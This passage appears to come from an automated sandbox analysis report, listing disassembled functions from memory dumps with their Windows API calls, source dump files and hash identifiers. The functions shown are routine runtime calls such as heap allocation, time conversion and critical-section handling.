                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50511A62B19A4246F6B8BE259600A7AEA85BF44BB4F944735DE7C077D5CF3CF4088620
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2976181284-0
                                                                                                                                                                                                  • Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                                                  • Instruction ID: d4476ff14fb7adf359d638732afd7d2ac0b14402ef3b6f3c21a12e4278dcd045
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F110462708E8181DA10EB25F410169AB61BB44BF4F940331EE7D07BEACE3CE4488350
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7102D4B49), ref: 00007FF7102D4C67
                                                                                                                                                                                                  • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7102D4B49), ref: 00007FF7102D4C7D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1707611234-0
                                                                                                                                                                                                  • Opcode ID: 5814b874014510fcf00941fef2b2171ed045486f006683dc2ae422325307d6da
                                                                                                                                                                                                  • Instruction ID: 8aea175930bcbef319251cc85c6eaa88f25b471b6d1dc56e7ce617c8e7aa4f09
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5814b874014510fcf00941fef2b2171ed045486f006683dc2ae422325307d6da
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8011943261CA4282EB546B11A40107FFBA1FB81775F900236FAAD41BE4EF3CE418DB20
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(?,?,?,00007FF7102E2032,?,?,?,00007FF7102E206F,?,?,00000000,00007FF7102E2535,?,?,?,00007FF7102E2467), ref: 00007FF7102D9C6E
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF7102E2032,?,?,?,00007FF7102E206F,?,?,00000000,00007FF7102E2535,?,?,?,00007FF7102E2467), ref: 00007FF7102D9C78
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 485612231-0
                                                                                                                                                                                                  • Opcode ID: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                                                                                                                  • Instruction ID: 8af03df93eb97882562127c5197512a0c912d9a778ef30d3dffcf2da9178f88c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 81E04F11F09E4242FB197BB1A44517A9A915F98721B804034D90D52391EE2CBC4D4330
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CloseHandle.KERNELBASE(?,?,?,00007FF7102D9CE5,?,?,00000000,00007FF7102D9D9A), ref: 00007FF7102D9ED6
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF7102D9CE5,?,?,00000000,00007FF7102D9D9A), ref: 00007FF7102D9EE0
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseErrorHandleLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 918212764-0
                                                                                                                                                                                                  • Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                                                                                                                  • Instruction ID: 95bf02464edc25d113211bec24cd5478de46edd2beadbc20f83ec404bc8adbfb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F821C613F1CE8241EE94B765A49037D9B926F847B0F94523AE92E477D5DE6CFC488320
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FFEEE1D34C9,?,?,?,00007FFEEE2139B1,?,?,?,?,00007FFEEE1D78EA,?,?,?), ref: 00007FFEEE1CDD38
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AllocHeap
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4292702814-0
                                                                                                                                                                                                  • Opcode ID: 27d2ecc8a82d26b6ee3a94a029cf6d96569e999f53c42dbd91e108040fe652f2
                                                                                                                                                                                                  • Instruction ID: 675af881cfa6a87567b8b2b63640daa2f1f2f64a5e18b2c913eabc1bd9a7478f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 27d2ecc8a82d26b6ee3a94a029cf6d96569e999f53c42dbd91e108040fe652f2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C211A320A1974281FA659F55B8027B66290AFCCF90F0B5135D99E8F3F9DFBCF4808642
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,00007FFEEE1DC80C), ref: 00007FFEEE1DC9C4
                                                                                                                                                                                                  • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,00007FFEEE1DC80C), ref: 00007FFEEE1DCA19
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3168844106-0
                                                                                                                                                                                                  • Opcode ID: 0291edbe3082b304451f4ed1c39b7bd1e6a79d51fcd4033be8e3744c9ea70ef5
                                                                                                                                                                                                  • Instruction ID: 934986bf45dd9251be1cd2d28819274f845bd42de1ffcb44796a83fbee124ca1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0291edbe3082b304451f4ed1c39b7bd1e6a79d51fcd4033be8e3744c9ea70ef5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 95112E31A1875282F351DF14F84067A6364FB88781F570936E9CE876B9EFBCE8918742
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FFEEE1DC7FD
                                                                                                                                                                                                    • Part of subcall function 00007FFEEE1DC998: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,00007FFEEE1DC80C), ref: 00007FFEEE1DC9C4
                                                                                                                                                                                                    • Part of subcall function 00007FFEEE1DC998: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,00007FFEEE1DC80C), ref: 00007FFEEE1DCA19
                                                                                                                                                                                                  • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FFEEE1DC823
                                                                                                                                                                                                    • Part of subcall function 00007FFEEE1DC93C: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FFEEE1DC95C
                                                                                                                                                                                                    • Part of subcall function 00007FFEEE1DC838: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FFEEE1DC89A
                                                                                                                                                                                                    • Part of subcall function 00007FFEEE1DC838: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FFEEE1DC8B0
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave$FileHandleInfoStartupType
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2762830733-0
                                                                                                                                                                                                  • Opcode ID: ec87571a4dd4f9888bb3e403b7d3050c44f51055bcf036c43b695e8927277bbf
                                                                                                                                                                                                  • Instruction ID: 8f12dfc1fe45194c42fde615b13068df81b079da0d2f788a3c9abbc3db88a8d3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec87571a4dd4f9888bb3e403b7d3050c44f51055bcf036c43b695e8927277bbf
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09E0EC10E0C50285FA24AFB0B8517BA13649FAC302F832536C8CEC51B2EF9CA4DA8712
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                  • Opcode ID: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                                                                                                                                  • Instruction ID: bc496c37a5be8dfadf0c79d888f0f482d86b07bd7d5a51d719af8fc0202299a3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1241D633918A0187EA65AB15E56127DFBA1EB55BA0F940131DA8E437D0CF3CF90AC760
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _fread_nolock
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 840049012-0
                                                                                                                                                                                                  • Opcode ID: e70aac82c324766ad75c35f46a96fc2a337dd4abb3dddf27600edfee51470123
                                                                                                                                                                                                  • Instruction ID: a4999c922a626897296ed41f330e5678b1a539a401698495f2ba828c30f53a5e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e70aac82c324766ad75c35f46a96fc2a337dd4abb3dddf27600edfee51470123
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C217421B28A5646FA10BA16AA047FAEA51BF45BE4FC85430DD0D07786DE7DF44DC720
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                  • Opcode ID: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                                                                                                                                                  • Instruction ID: 9ab2117bcda30c2885cf15b27a27fee60fe8a54f353d8c5a67b70036354b8004
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F318E23A18E4286F751BB1998417BDAE50AB50BB1F910236EA1D137D2CFBCFC498731
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3947729631-0
                                                                                                                                                                                                  • Opcode ID: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                                                                                  • Instruction ID: ca1a2d571a079b8f54b510533715dae3022e8a4023def28a3135ecad6aefc744
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90219F33A25B05C9EB25AF64C4402EC7BA0FB04328F94463AD62C06BC5DF78E948C760
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                  • Opcode ID: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                                                                                                                  • Instruction ID: 8237246494f8a04ed9263caabded2688cde04a42bf6459fe7c16a6cfd324d2f8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 39118723A1CA5142EA60BF55940027EFA64BF55BA0F944531EE4C57B95CF7CFC488760
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                  • Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                                                                                                                  • Instruction ID: aef1523c32d0850b5140d17db408c396f804f4a199ca792b8678549071aa0adb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD216572618E8187DB61AF18D440379FAA0FB94BA4FA44234E65D477D9EF3DE8148B10
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                  • Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                                                                                                                  • Instruction ID: e4bd270a8cee942c80407af99e9dc6e5e441936de7cf31623d2850cd8b634d61
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5901A521A18B4241E944FB5659004B9EA95AB55FF0F884631DE5C17BD6DE3CF40A8310
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: __vcrt_initialize_locks__vcrt_initialize_winapi_thunks
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2444027679-0
                                                                                                                                                                                                  • Opcode ID: 267e1e33e985904d0087cc8bc5e2fb633dc7a44b110c5dfb642aea7bba0d9fe0
                                                                                                                                                                                                  • Instruction ID: 6ae2ef9b8096434a70864584fb3b69923618f3f3ff8b3f832632085073c7d7f2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 267e1e33e985904d0087cc8bc5e2fb633dc7a44b110c5dfb642aea7bba0d9fe0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E113D21E0974241FE615F25F4043B863A1AF88BE0F5B8636D5ED063F9DFACE981C602
                                                                                                                                                                                                  APIs
